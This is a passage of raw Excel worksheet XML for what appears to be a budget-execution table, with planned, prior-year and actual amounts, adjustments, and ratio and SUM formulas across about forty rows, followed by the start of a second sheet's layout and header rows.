      <c r="A5" s="5" t="s">
        <v>135</v>
      </c>
      <c r="B5" s="5">
        <f t="shared" ref="B5" si="0">SUM(B6:B9)</f>
        <v>62000</v>
      </c>
      <c r="C5" s="5">
        <f>SUM(C6:C9)</f>
        <v>37361</v>
      </c>
      <c r="D5" s="5">
        <f>SUM(D6:D9)</f>
        <v>44979</v>
      </c>
      <c r="E5" s="43">
        <f>D5/B5</f>
        <v>0.72546774193548391</v>
      </c>
      <c r="F5" s="5">
        <f>SUM(F6:F9)</f>
        <v>-5000</v>
      </c>
      <c r="G5" s="5">
        <f t="shared" ref="G5" si="1">B5+F5</f>
        <v>57000</v>
      </c>
      <c r="H5" s="43">
        <f t="shared" ref="H5" si="2">(G5-C5)/C5</f>
        <v>0.52565509488504059</v>
      </c>
      <c r="I5" s="5"/>
    </row>
    <row r="6" spans="1:9" ht="13.5" customHeight="1">
      <c r="A6" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B6" s="3">
        <v>54781</v>
      </c>
      <c r="C6" s="3">
        <v>30734</v>
      </c>
      <c r="D6" s="3">
        <v>39928</v>
      </c>
      <c r="E6" s="44">
        <f>D6/B6</f>
        <v>0.72886584764790707</v>
      </c>
      <c r="F6" s="3">
        <v>-4260</v>
      </c>
      <c r="G6" s="3">
        <f>B6+F6</f>
        <v>50521</v>
      </c>
      <c r="H6" s="44">
        <f t="shared" ref="H6:H45" si="3">(G6-C6)/C6</f>
        <v>0.64381466779462482</v>
      </c>
      <c r="I6" s="3"/>
    </row>
    <row r="7" spans="1:9" ht="13.5" customHeight="1">
      <c r="A7" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B7" s="3">
        <v>19</v>
      </c>
      <c r="C7" s="3">
        <v>16</v>
      </c>
      <c r="D7" s="3">
        <v>12</v>
      </c>
      <c r="E7" s="44">
        <f t="shared" ref="E7" si="4">D7/B7</f>
        <v>0.63157894736842102</v>
      </c>
      <c r="F7" s="3"/>
      <c r="G7" s="3">
        <f>B7+F7</f>
        <v>19</v>
      </c>
      <c r="H7" s="44">
        <f t="shared" si="3"/>
        <v>0.1875</v>
      </c>
      <c r="I7" s="3"/>
    </row>
    <row r="8" spans="1:9" ht="13.5" customHeight="1">
      <c r="A8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B8" s="3">
        <v>7200</v>
      </c>
      <c r="C8" s="3">
        <v>6611</v>
      </c>
      <c r="D8" s="3">
        <v>5039</v>
      </c>
      <c r="E8" s="44">
        <f>D8/B8</f>
        <v>0.69986111111111116</v>
      </c>
      <c r="F8" s="3">
        <v>-740</v>
      </c>
      <c r="G8" s="3">
        <f>B8+F8</f>
        <v>6460</v>
      </c>
      <c r="H8" s="44">
        <f t="shared" si="3"/>
        <v>-2.2840720012101044E-2</v>
      </c>
      <c r="I8" s="3"/>
    </row>
    <row r="9" spans="1:9" ht="13.5" customHeight="1">
      <c r="A9" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B9" s="3"/>
      <c r="C9" s="3"/>
      <c r="D9" s="3"/>
      <c r="E9" s="44" t="e">
        <f>D9/B9</f>
        <v>#DIV/0!</v>
      </c>
      <c r="F9" s="3"/>
      <c r="G9" s="3">
        <f>B9+F9</f>
        <v>0</v>
      </c>
      <c r="H9" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I9" s="3"/>
    </row>
    <row r="10" spans="1:9" s="2" customFormat="1" ht="13.5" customHeight="1">
      <c r="A10" s="5" t="s">
        <v>136</v>
      </c>
      <c r="B10" s="5">
        <f t="shared" ref="B10" si="5">SUM(B11:B28)</f>
        <v>64000</v>
      </c>
      <c r="C10" s="5">
        <f>SUM(C11:C28)</f>
        <v>57423</v>
      </c>
      <c r="D10" s="5">
        <f>SUM(D11:D28)</f>
        <v>36759</v>
      </c>
      <c r="E10" s="43">
        <f>D10/B10</f>
        <v>0.57435937500000001</v>
      </c>
      <c r="F10" s="5">
        <f>SUM(F11:F28)</f>
        <v>-15000</v>
      </c>
      <c r="G10" s="5">
        <f>SUM(G11:G28)</f>
        <v>49000</v>
      </c>
      <c r="H10" s="43">
        <f t="shared" si="3"/>
        <v>-0.14668338470647649</v>
      </c>
      <c r="I10" s="5"/>
    </row>
    <row r="11" spans="1:9" ht="13.5" customHeight="1">
      <c r="A11" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B11" s="3">
        <v>300</v>
      </c>
      <c r="C11" s="3">
        <v>9801</v>
      </c>
      <c r="D11" s="3">
        <v>590</v>
      </c>
      <c r="E11" s="44">
        <f>D11/B11</f>
        <v>1.9666666666666666</v>
      </c>
      <c r="F11" s="3">
        <v>350</v>
      </c>
      <c r="G11" s="3">
        <f t="shared" ref="G11" si="6">B11+F11</f>
        <v>650</v>
      </c>
      <c r="H11" s="44">
        <f t="shared" si="3"/>
        <v>-0.93368023671053979</v>
      </c>
      <c r="I11" s="3"/>
    </row>
    <row r="12" spans="1:9" ht="13.5" customHeight="1">
      <c r="A12" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B12" s="3">
        <v>4500</v>
      </c>
      <c r="C12" s="3">
        <v>3664</v>
      </c>
      <c r="D12" s="3">
        <v>3401</v>
      </c>
      <c r="E12" s="44">
        <f>D12/B12</f>
        <v>0.75577777777777777</v>
      </c>
      <c r="F12" s="3">
        <v>700</v>
      </c>
      <c r="G12" s="3">
        <f t="shared" ref="G12:G29" si="7">B12+F12</f>
        <v>5200</v>
      </c>
      <c r="H12" s="44">
        <f t="shared" si="3"/>
        <v>0.41921397379912662</v>
      </c>
      <c r="I12" s="3"/>
    </row>
    <row r="13" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A13" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B13" s="3"/>
      <c r="C13" s="3"/>
      <c r="D13" s="3"/>
      <c r="E13" s="44"/>
      <c r="F13" s="3"/>
      <c r="G13" s="3">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="H13" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I13" s="3"/>
    </row>
    <row r="14" spans="1:9" ht="13.5" customHeight="1">
      <c r="A14" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B14" s="3">
        <v>5300</v>
      </c>
      <c r="C14" s="3">
        <v>4790</v>
      </c>
      <c r="D14" s="3">
        <v>5282</v>
      </c>
      <c r="E14" s="44">
        <f t="shared" ref="E14" si="8">D14/B14</f>
        <v>0.99660377358490571</v>
      </c>
      <c r="F14" s="3">
        <v>1700</v>
      </c>
      <c r="G14" s="3">
        <f t="shared" si="7"/>
        <v>7000</v>
      </c>
      <c r="H14" s="44">
        <f t="shared" si="3"/>
        <v>0.4613778705636743</v>
      </c>
      <c r="I14" s="3"/>
    </row>
    <row r="15" spans="1:9" ht="13.5" customHeight="1">
      <c r="A15" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B15" s="3">
        <v>100</v>
      </c>
      <c r="C15" s="3">
        <v>85</v>
      </c>
      <c r="D15" s="3">
        <v>52</v>
      </c>
      <c r="E15" s="44">
        <f t="shared" ref="E15:E45" si="9">D15/B15</f>
        <v>0.52</v>
      </c>
      <c r="F15" s="3">
        <v>-20</v>
      </c>
      <c r="G15" s="3">
        <f t="shared" si="7"/>
        <v>80</v>
      </c>
      <c r="H15" s="44">
        <f t="shared" si="3"/>
        <v>-5.8823529411764705E-2</v>
      </c>
      <c r="I15" s="3"/>
    </row>
    <row r="16" spans="1:9" ht="13.5" customHeight="1">
      <c r="A16" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B16" s="3">
        <v>2800</v>
      </c>
      <c r="C16" s="3">
        <v>2412</v>
      </c>
      <c r="D16" s="3">
        <v>2725</v>
      </c>
      <c r="E16" s="44">
        <f t="shared" si="9"/>
        <v>0.9732142857142857</v>
      </c>
      <c r="F16" s="3"/>
      <c r="G16" s="3">
        <f t="shared" si="7"/>
        <v>2800</v>
      </c>
      <c r="H16" s="44">
        <f t="shared" si="3"/>
        <v>0.16086235489220563</v>
      </c>
      <c r="I16" s="3"/>
    </row>
    <row r="17" spans="1:9" ht="13.5" customHeight="1">
      <c r="A17" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B17" s="3">
        <v>2300</v>
      </c>
      <c r="C17" s="3">
        <v>1572</v>
      </c>
      <c r="D17" s="3">
        <v>1489</v>
      </c>
      <c r="E17" s="44">
        <f t="shared" si="9"/>
        <v>0.6473913043478261</v>
      </c>
      <c r="F17" s="3"/>
      <c r="G17" s="3">
        <f t="shared" si="7"/>
        <v>2300</v>
      </c>
      <c r="H17" s="44">
        <f t="shared" si="3"/>
        <v>0.46310432569974552</v>
      </c>
      <c r="I17" s="3"/>
    </row>
    <row r="18" spans="1:9" ht="13.5" customHeight="1">
      <c r="A18" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B18" s="3">
        <v>900</v>
      </c>
      <c r="C18" s="3">
        <v>769</v>
      </c>
      <c r="D18" s="3">
        <v>921</v>
      </c>
      <c r="E18" s="44">
        <f t="shared" si="9"/>
        <v>1.0233333333333334</v>
      </c>
      <c r="F18" s="3">
        <v>50</v>
      </c>
      <c r="G18" s="3">
        <f t="shared" si="7"/>
        <v>950</v>
      </c>
      <c r="H18" s="44">
        <f t="shared" si="3"/>
        <v>0.23537061118335501</v>
      </c>
      <c r="I18" s="3"/>
    </row>
    <row r="19" spans="1:9" ht="13.5" customHeight="1">
      <c r="A19" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B19" s="3">
        <v>3300</v>
      </c>
      <c r="C19" s="3">
        <v>2981</v>
      </c>
      <c r="D19" s="3">
        <v>4444</v>
      </c>
      <c r="E19" s="44">
        <f t="shared" si="9"/>
        <v>1.3466666666666667</v>
      </c>
      <c r="F19" s="3">
        <v>1000</v>
      </c>
      <c r="G19" s="3">
        <f t="shared" si="7"/>
        <v>4300</v>
      </c>
      <c r="H19" s="44">
        <f t="shared" si="3"/>
        <v>0.44246897014424691</v>
      </c>
      <c r="I19" s="3"/>
    </row>
    <row r="20" spans="1:9" ht="13.5" customHeight="1">
      <c r="A20" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B20" s="3">
        <v>12000</v>
      </c>
      <c r="C20" s="3">
        <v>9371</v>
      </c>
      <c r="D20" s="3">
        <v>6443</v>
      </c>
      <c r="E20" s="44">
        <f t="shared" si="9"/>
        <v>0.53691666666666671</v>
      </c>
      <c r="F20" s="3">
        <v>-3300</v>
      </c>
      <c r="G20" s="3">
        <f t="shared" si="7"/>
        <v>8700</v>
      </c>
      <c r="H20" s="44">
        <f t="shared" si="3"/>
        <v>-7.1603884323978226E-2</v>
      </c>
      <c r="I20" s="3"/>
    </row>
    <row r="21" spans="1:9" ht="13.5" customHeight="1">
      <c r="A21" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B21" s="3">
        <v>700</v>
      </c>
      <c r="C21" s="3">
        <v>637</v>
      </c>
      <c r="D21" s="3">
        <v>586</v>
      </c>
      <c r="E21" s="44">
        <f t="shared" si="9"/>
        <v>0.83714285714285719</v>
      </c>
      <c r="F21" s="3"/>
      <c r="G21" s="3">
        <f t="shared" si="7"/>
        <v>700</v>
      </c>
      <c r="H21" s="44">
        <f t="shared" si="3"/>
        <v>9.8901098901098897E-2</v>
      </c>
      <c r="I21" s="3"/>
    </row>
    <row r="22" spans="1:9" ht="13.5" customHeight="1">
      <c r="A22" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B22" s="3">
        <v>2600</v>
      </c>
      <c r="C22" s="3">
        <v>2496</v>
      </c>
      <c r="D22" s="3">
        <v>500</v>
      </c>
      <c r="E22" s="44">
        <f t="shared" si="9"/>
        <v>0.19230769230769232</v>
      </c>
      <c r="F22" s="3">
        <v>-150</v>
      </c>
      <c r="G22" s="3">
        <f t="shared" si="7"/>
        <v>2450</v>
      </c>
      <c r="H22" s="44">
        <f t="shared" si="3"/>
        <v>-1.842948717948718E-2</v>
      </c>
      <c r="I22" s="3"/>
    </row>
    <row r="23" spans="1:9" ht="13.5" customHeight="1">
      <c r="A23" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B23" s="3">
        <v>8700</v>
      </c>
      <c r="C23" s="3">
        <v>5811</v>
      </c>
      <c r="D23" s="3">
        <v>2013</v>
      </c>
      <c r="E23" s="44">
        <f t="shared" si="9"/>
        <v>0.23137931034482759</v>
      </c>
      <c r="F23" s="3">
        <v>-5700</v>
      </c>
      <c r="G23" s="3">
        <f t="shared" si="7"/>
        <v>3000</v>
      </c>
      <c r="H23" s="44">
        <f t="shared" si="3"/>
        <v>-0.48373773877129583</v>
      </c>
      <c r="I23" s="3"/>
    </row>
    <row r="24" spans="1:9" ht="13.5" customHeight="1">
      <c r="A24" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B24" s="3">
        <v>18500</v>
      </c>
      <c r="C24" s="3">
        <v>11090</v>
      </c>
      <c r="D24" s="3">
        <v>5794</v>
      </c>
      <c r="E24" s="44">
        <f t="shared" si="9"/>
        <v>0.3131891891891892</v>
      </c>
      <c r="F24" s="3">
        <v>-10544</v>
      </c>
      <c r="G24" s="3">
        <f t="shared" si="7"/>
        <v>7956</v>
      </c>
      <c r="H24" s="44">
        <f t="shared" si="3"/>
        <v>-0.28259693417493237</v>
      </c>
      <c r="I24" s="3"/>
    </row>
    <row r="25" spans="1:9" ht="13.5" customHeight="1">
      <c r="A25" s="3" t="s">
        <v>137</v>
      </c>
      <c r="B25" s="3">
        <v>1200</v>
      </c>
      <c r="C25" s="3">
        <v>1168</v>
      </c>
      <c r="D25" s="3">
        <v>1275</v>
      </c>
      <c r="E25" s="44">
        <f t="shared" si="9"/>
        <v>1.0625</v>
      </c>
      <c r="F25" s="3">
        <v>300</v>
      </c>
      <c r="G25" s="3">
        <f t="shared" si="7"/>
        <v>1500</v>
      </c>
      <c r="H25" s="44">
        <f t="shared" si="3"/>
        <v>0.28424657534246578</v>
      </c>
      <c r="I25" s="3"/>
    </row>
    <row r="26" spans="1:9" ht="13.5" customHeight="1">
      <c r="A26" s="3" t="s">
        <v>138</v>
      </c>
      <c r="B26" s="3">
        <v>800</v>
      </c>
      <c r="C26" s="3">
        <v>776</v>
      </c>
      <c r="D26" s="3">
        <v>884</v>
      </c>
      <c r="E26" s="44">
        <f t="shared" si="9"/>
        <v>1.105</v>
      </c>
      <c r="F26" s="3">
        <v>200</v>
      </c>
      <c r="G26" s="3">
        <f t="shared" si="7"/>
        <v>1000</v>
      </c>
      <c r="H26" s="44">
        <f t="shared" si="3"/>
        <v>0.28865979381443296</v>
      </c>
      <c r="I26" s="3"/>
    </row>
    <row r="27" spans="1:9" ht="13.5" customHeight="1">
      <c r="A27" s="3" t="s">
        <v>139</v>
      </c>
      <c r="B27" s="3"/>
      <c r="C27" s="3"/>
      <c r="D27" s="3">
        <v>86</v>
      </c>
      <c r="E27" s="44" t="e">
        <f t="shared" si="9"/>
        <v>#DIV/0!</v>
      </c>
      <c r="F27" s="3">
        <v>64</v>
      </c>
      <c r="G27" s="3">
        <f t="shared" si="7"/>
        <v>64</v>
      </c>
      <c r="H27" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I27" s="3"/>
    </row>
    <row r="28" spans="1:9" ht="13.5" customHeight="1">
      <c r="A28" s="3" t="s">
        <v>140</v>
      </c>
      <c r="B28" s="3"/>
      <c r="C28" s="3"/>
      <c r="D28" s="3">
        <v>274</v>
      </c>
      <c r="E28" s="44" t="e">
        <f t="shared" si="9"/>
        <v>#DIV/0!</v>
      </c>
      <c r="F28" s="3">
        <v>350</v>
      </c>
      <c r="G28" s="3">
        <f t="shared" si="7"/>
        <v>350</v>
      </c>
      <c r="H28" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I28" s="3"/>
    </row>
    <row r="29" spans="1:9" s="2" customFormat="1" ht="13.5" customHeight="1">
      <c r="A29" s="5" t="s">
        <v>141</v>
      </c>
      <c r="B29" s="5">
        <f t="shared" ref="B29" si="10">SUM(B31:B44)</f>
        <v>54248</v>
      </c>
      <c r="C29" s="5">
        <f>SUM(C31:C44)</f>
        <v>73672</v>
      </c>
      <c r="D29" s="5">
        <f>SUM(D31:D44)</f>
        <v>45685</v>
      </c>
      <c r="E29" s="43">
        <f t="shared" si="9"/>
        <v>0.84215086270461581</v>
      </c>
      <c r="F29" s="5">
        <f>SUM(F31:F44)</f>
        <v>8752</v>
      </c>
      <c r="G29" s="5">
        <f t="shared" si="7"/>
        <v>63000</v>
      </c>
      <c r="H29" s="43">
        <f t="shared" si="3"/>
        <v>-0.14485829080247584</v>
      </c>
      <c r="I29" s="5"/>
    </row>
    <row r="30" spans="1:9" ht="13.5" customHeight="1">
      <c r="A30" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B30" s="3">
        <f t="shared" ref="B30" si="11">SUM(B31:B40)</f>
        <v>3410</v>
      </c>
      <c r="C30" s="3">
        <f>SUM(C31:C40)</f>
        <v>3101</v>
      </c>
      <c r="D30" s="3">
        <f>SUM(D31:D40)</f>
        <v>614</v>
      </c>
      <c r="E30" s="44">
        <f t="shared" si="9"/>
        <v>0.18005865102639296</v>
      </c>
      <c r="F30" s="3">
        <f>SUM(F31:F40)</f>
        <v>100</v>
      </c>
      <c r="G30" s="3">
        <f>SUM(G31:G40)</f>
        <v>3510</v>
      </c>
      <c r="H30" s="44">
        <f t="shared" si="3"/>
        <v>0.13189293776201225</v>
      </c>
      <c r="I30" s="3"/>
    </row>
    <row r="31" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A31" s="3" t="s">
        <v>142</v>
      </c>
      <c r="B31" s="3">
        <v>700</v>
      </c>
      <c r="C31" s="3">
        <v>673</v>
      </c>
      <c r="D31" s="3"/>
      <c r="E31" s="44">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="F31" s="3"/>
      <c r="G31" s="3">
        <f t="shared" ref="G31" si="12">B31+F31</f>
        <v>700</v>
      </c>
      <c r="H31" s="44">
        <f t="shared" si="3"/>
        <v>4.0118870728083213E-2</v>
      </c>
      <c r="I31" s="3"/>
    </row>
    <row r="32" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A32" s="3" t="s">
        <v>143</v>
      </c>
      <c r="B32" s="3">
        <v>60</v>
      </c>
      <c r="C32" s="3"/>
      <c r="D32" s="3"/>
      <c r="E32" s="44">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="F32" s="3"/>
      <c r="G32" s="3">
        <f t="shared" ref="G32:G45" si="13">B32+F32</f>
        <v>60</v>
      </c>
      <c r="H32" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I32" s="3"/>
    </row>
    <row r="33" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A33" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B33" s="3"/>
      <c r="C33" s="3"/>
      <c r="D33" s="3"/>
      <c r="E33" s="44" t="e">
        <f t="shared" si="9"/>
        <v>#DIV/0!</v>
      </c>
      <c r="F33" s="3"/>
      <c r="G33" s="3">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="H33" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I33" s="3"/>
    </row>
    <row r="34" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A34" s="3" t="s">
        <v>145</v>
      </c>
      <c r="B34" s="3">
        <v>40</v>
      </c>
      <c r="C34" s="3"/>
      <c r="D34" s="3"/>
      <c r="E34" s="44">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="F34" s="3"/>
      <c r="G34" s="3">
        <f t="shared" si="13"/>
        <v>40</v>
      </c>
      <c r="H34" s="44" t="e">
        <f t="shared" si="3"/>
        <v>#DIV/0!</v>
      </c>
      <c r="I34" s="3"/>
    </row>
    <row r="35" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A35" s="3" t="s">
        <v>146</v>
      </c>
      <c r="B35" s="3">
        <v>400</v>
      </c>
      <c r="C35" s="3">
        <v>395</v>
      </c>
      <c r="D35" s="3">
        <f>295-86</f>
        <v>209</v>
      </c>
      <c r="E35" s="44">
        <f t="shared" si="9"/>
        <v>0.52249999999999996</v>
      </c>
      <c r="F35" s="3">
        <v>100</v>
      </c>
      <c r="G35" s="3">
        <f t="shared" si="13"/>
        <v>500</v>
      </c>
      <c r="H35" s="44">
        <f t="shared" si="3"/>
        <v>0.26582278481012656</v>
      </c>
      <c r="I35" s="3"/>
    </row>
    <row r="36" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A36" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B36" s="3">
        <v>600</v>
      </c>
      <c r="C36" s="3">
        <v>569</v>
      </c>
      <c r="D36" s="3">
        <v>186</v>
      </c>
      <c r="E36" s="44">
        <f t="shared" si="9"/>
        <v>0.31</v>
      </c>
      <c r="F36" s="3"/>
      <c r="G36" s="3">
        <f t="shared" si="13"/>
        <v>600</v>
      </c>
      <c r="H36" s="44">
        <f t="shared" si="3"/>
        <v>5.4481546572934976E-2</v>
      </c>
      <c r="I36" s="3"/>
    </row>
    <row r="37" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A37" s="3" t="s">
        <v>148</v>
      </c>
      <c r="B37" s="3">
        <v>400</v>
      </c>
      <c r="C37" s="3">
        <v>343</v>
      </c>
      <c r="D37" s="3">
        <v>108</v>
      </c>
      <c r="E37" s="44">
        <f t="shared" si="9"/>
        <v>0.27</v>
      </c>
      <c r="F37" s="3"/>
      <c r="G37" s="3">
        <f t="shared" si="13"/>
        <v>400</v>
      </c>
      <c r="H37" s="44">
        <f t="shared" si="3"/>
        <v>0.16618075801749271</v>
      </c>
      <c r="I37" s="3"/>
    </row>
    <row r="38" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A38" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B38" s="3">
        <v>10</v>
      </c>
      <c r="C38" s="3">
        <v>5</v>
      </c>
      <c r="D38" s="3"/>
      <c r="E38" s="44">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="F38" s="3"/>
      <c r="G38" s="3">
        <f t="shared" si="13"/>
        <v>10</v>
      </c>
      <c r="H38" s="44">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="I38" s="3"/>
    </row>
    <row r="39" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A39" s="3" t="s">
        <v>150</v>
      </c>
      <c r="B39" s="3">
        <v>600</v>
      </c>
      <c r="C39" s="3">
        <v>538</v>
      </c>
      <c r="D39" s="3">
        <v>93</v>
      </c>
      <c r="E39" s="44">
        <f t="shared" si="9"/>
        <v>0.155</v>
      </c>
      <c r="F39" s="3"/>
      <c r="G39" s="3">
        <f t="shared" si="13"/>
        <v>600</v>
      </c>
      <c r="H39" s="44">
        <f t="shared" si="3"/>
        <v>0.11524163568773234</v>
      </c>
      <c r="I39" s="3"/>
    </row>
    <row r="40" spans="1:9" ht="13.5" hidden="1" customHeight="1">
      <c r="A40" s="3" t="s">
        <v>151</v>
      </c>
      <c r="B40" s="3">
        <v>600</v>
      </c>
      <c r="C40" s="3">
        <v>578</v>
      </c>
      <c r="D40" s="3">
        <v>18</v>
      </c>
      <c r="E40" s="44">
        <f t="shared" si="9"/>
        <v>0.03</v>
      </c>
      <c r="F40" s="3"/>
      <c r="G40" s="3">
        <f t="shared" si="13"/>
        <v>600</v>
      </c>
      <c r="H40" s="44">
        <f t="shared" si="3"/>
        <v>3.8062283737024222E-2</v>
      </c>
      <c r="I40" s="3"/>
    </row>
    <row r="41" spans="1:9" ht="13.5" customHeight="1">
      <c r="A41" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B41" s="3">
        <v>39400</v>
      </c>
      <c r="C41" s="3">
        <v>40303</v>
      </c>
      <c r="D41" s="3">
        <v>33489</v>
      </c>
      <c r="E41" s="44">
        <f t="shared" si="9"/>
        <v>0.84997461928934015</v>
      </c>
      <c r="F41" s="3">
        <v>2400</v>
      </c>
      <c r="G41" s="3">
        <f t="shared" si="13"/>
        <v>41800</v>
      </c>
      <c r="H41" s="44">
        <f t="shared" si="3"/>
        <v>3.7143636950102969E-2</v>
      </c>
      <c r="I41" s="3"/>
    </row>
    <row r="42" spans="1:9" ht="13.5" customHeight="1">
      <c r="A42" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B42" s="3">
        <v>6000</v>
      </c>
      <c r="C42" s="3">
        <v>9101</v>
      </c>
      <c r="D42" s="3">
        <v>5197</v>
      </c>
      <c r="E42" s="44">
        <f t="shared" si="9"/>
        <v>0.86616666666666664</v>
      </c>
      <c r="F42" s="3">
        <v>3600</v>
      </c>
      <c r="G42" s="3">
        <f t="shared" si="13"/>
        <v>9600</v>
      </c>
      <c r="H42" s="44">
        <f t="shared" si="3"/>
        <v>5.482913965498297E-2</v>
      </c>
      <c r="I42" s="3"/>
    </row>
    <row r="43" spans="1:9" ht="13.5" customHeight="1">
      <c r="A43" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B43" s="3">
        <v>5438</v>
      </c>
      <c r="C43" s="3">
        <v>6545</v>
      </c>
      <c r="D43" s="3">
        <v>4084</v>
      </c>
      <c r="E43" s="44">
        <f t="shared" si="9"/>
        <v>0.75101140125045973</v>
      </c>
      <c r="F43" s="3">
        <v>300</v>
      </c>
      <c r="G43" s="3">
        <f t="shared" si="13"/>
        <v>5738</v>
      </c>
      <c r="H43" s="44">
        <f t="shared" si="3"/>
        <v>-0.12330022918258213</v>
      </c>
      <c r="I43" s="3"/>
    </row>
    <row r="44" spans="1:9" ht="13.5" customHeight="1">
      <c r="A44" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B44" s="3">
        <v>0</v>
      </c>
      <c r="C44" s="3">
        <v>14622</v>
      </c>
      <c r="D44" s="3">
        <v>2301</v>
      </c>
      <c r="E44" s="44" t="e">
        <f t="shared" si="9"/>
        <v>#DIV/0!</v>
      </c>
      <c r="F44" s="3">
        <v>2352</v>
      </c>
      <c r="G44" s="3">
        <f t="shared" si="13"/>
        <v>2352</v>
      </c>
      <c r="H44" s="44">
        <f t="shared" si="3"/>
        <v>-0.83914649158801802</v>
      </c>
      <c r="I44" s="3"/>
    </row>
    <row r="45" spans="1:9" s="2" customFormat="1" ht="21" customHeight="1">
      <c r="A45" s="5" t="s">
        <v>152</v>
      </c>
      <c r="B45" s="5">
        <f t="shared" ref="B45" si="14">B29+B10+B5</f>
        <v>180248</v>
      </c>
      <c r="C45" s="5">
        <f>C29+C10+C5</f>
        <v>168456</v>
      </c>
      <c r="D45" s="5">
        <f>D29+D10+D5</f>
        <v>127423</v>
      </c>
      <c r="E45" s="43">
        <f t="shared" si="9"/>
        <v>0.70693156096045451</v>
      </c>
      <c r="F45" s="5">
        <f>F29+F10+F5</f>
        <v>-11248</v>
      </c>
      <c r="G45" s="5">
        <f t="shared" si="13"/>
        <v>169000</v>
      </c>
      <c r="H45" s="43">
        <f t="shared" si="3"/>
        <v>3.2293299140428362E-3</v>
      </c>
      <c r="I45" s="5"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A1:I1"/>
    <mergeCell ref="B3:H3"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="I3:I4"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.74791666666666701" right="0.74791666666666701" top="0.59027777777777801" bottom="0.59027777777777801" header="0.51180555555555596" footer="0.31388888888888899"/>
  <pageSetup paperSize="9" firstPageNumber="3" orientation="landscape" useFirstPageNumber="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H53"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" sqref="A1:H1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="31" style="33" customWidth="1"/>
    <col min="2" max="3" width="13.375" style="33" customWidth="1"/>
    <col min="4" max="4" width="14.5" style="33" customWidth="1"/>
    <col min="5" max="5" width="14.375" style="33" customWidth="1"/>
    <col min="6" max="6" width="13.375" style="33" customWidth="1"/>
    <col min="7" max="7" width="10.875" style="34" customWidth="1"/>
    <col min="8" max="8" width="14.125" style="33" customWidth="1"/>
    <col min="9" max="16384" width="9" style="33"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="19.5" customHeight="1">
      <c r="A1" s="58" t="s">
        <v>805</v>
      </c>
      <c r="B1" s="58"/>
      <c r="C1" s="58"/>
      <c r="D1" s="58"/>
      <c r="E1" s="58"/>
      <c r="F1" s="58"/>
      <c r="G1" s="58"/>
      <c r="H1" s="58"/>
    </row>
    <row r="2" spans="1:8" ht="16.5" customHeight="1">
      <c r="G2" s="59" t="s">
        <v>0</v>
      </c>
      <c r="H2" s="59"/>
    </row>
    <row r="3" spans="1:8" s="32" customFormat="1" ht="21" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>125</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>153</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>129</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>130</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>7</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>133</v>
      </c>
      <c r="G3" s="35" t="s">
        <v>154</v>
      </c>
      <c r="H3" s="4" t="s">
        <v>127</v>
      </c>
